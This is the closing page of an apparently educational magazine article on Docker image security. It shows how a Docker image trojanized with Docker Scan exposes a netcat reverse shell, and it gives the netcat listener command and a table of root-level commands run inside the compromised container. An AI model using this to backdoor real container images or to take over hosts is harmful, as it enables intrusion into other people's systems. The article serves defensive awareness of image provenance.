« Previous 1 2 3 4
Docker image security analysis
Pedigree
Backdoor Access
Considering how well Docker Scan handled the Docker API and processed its commands, I'm certain the image is indeed running netcat in the background, which is providing remote shell access. Of course, you can check that properly by running your new image (image 35640fed495c is tagged as nginx:latest ) and firing up a new Nginx container:
$ docker run nginx:latest
By using netcat in the other direction, you connect the listening netcat instance within the container. You can refer back to the netcat article mentioned earlier [11] if you get stuck. Note that the command
$ nc -v -k -l XXX.XXX.XXX.XXX 2222
connects locally (not publicly, which is what the XXX.XXX.XXX.XXX
IP address would provide under the trojanize
command used earlier).
Table 1 spills the beans: You're logged in as root and have access the top level of the filesystem! For clarity, I include the commands I used; they run in a pseudo-shell of sorts that does not have the usual prompt. Frighteningly enough, however, such a shell runs all the system-level commands you'd need to hack a container and, potentially, its host.
Table 1
Filesystem Top Level
ls /
|
|
bin
|
proc
|
boot
|
root
|
dev
|
run
|
etc
|
sbin
|
home
|
srv
|
lib
|
sys
|
lib64
|
tmp
|
media
|
usr
|
mnt
|
var
|
opt
|
|
|
|
whoami
|
ls -al /usr/share/nginx
|
root
|
total 12
|
|
drwxr-xr-x 3 root root 4096 Feb 6 08:11 .
|
|
drwxr-xr-x 1 root root 4096 Feb 18 13:37 ..
|
|
drwxr-xr-x 2 root root 4096 Feb 6 08:11 html
|
As you can imagine from the information in Table 1, you now truly own the container and indeed anything that it can do on the host. I will leave you to mull over the blast radius that might involve.
The End Is Nigh
With popular image registries now brimming with publicly accessible images, you can see why being able to determine the provenance of a container image is so critical to your security posture.
I've barely scratched the surface of the sophisticated Docker Scan tool, which I hope you will spend some time looking into. Once the Python environment is up and running, it's very slick and easy to use, with a number of features that are well worth investigating.
Infos
- "Keeping Docker containers safe" by Chris Binnie, ADMIN , issue 37, 2017, pg. 46: http://www.admin-magazine.com/Archive/2017/37/Keeping-Docker-containers-safe
- CVE website: https://cve.mitre.org
- Docker Scan: https://github.com/cr0hn/dockerscan
- Docker Scan on YouTube: https://www.youtube.com/watch?v=OwX1e4y4JMk&feature=youtu.be
- "Troubleshooting Kubernetes and Docker with a SuperContainer" by Chris Binnie, ADMIN , issue 40, 2017, pg. 26, http://www.admin-magazine.com/Archive/2017/40/Troubleshooting-Kubernetes-and-Docker-with-a-SuperContainer
- Dockerfile: https://github.com/nginxinc/docker-nginx/blob/baa050df601b5e798431a9db458e16f53b1031f6/mainline/stretch/Dockerfile
- Installing Python 3.6.1: http://ubuntuhandbook.org/index.php/2017/07/install-python-3-6-1-in-ubuntu-16-04-lts/
- Docker CE: https://docs.docker.com/install/linux/docker-ce/ubuntu/
- YouTube reference for Docker Scan: https://www.youtube.com/watch?v=UvtBGIb3E3o&feature=youtu.be
- Hardening Docker: https://www.linux.com/blog/learn/2017/8/hardening-docker-hosts-user-namespaces
- "Netcat – The Admin's Best Friend" by Chris Binnie: http://www.admin-magazine.com/Articles/Netcat-The-Admin-s-Best-Friend
« Previous 1 2 3 4
Buy this article as PDF
(incl. VAT)
Buy ADMIN Magazine
Subscribe to our ADMIN Newsletters
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Most Popular
Support Our Work
ADMIN content is made possible with support from readers like you. Please consider contributing when you've found an article to be beneficial.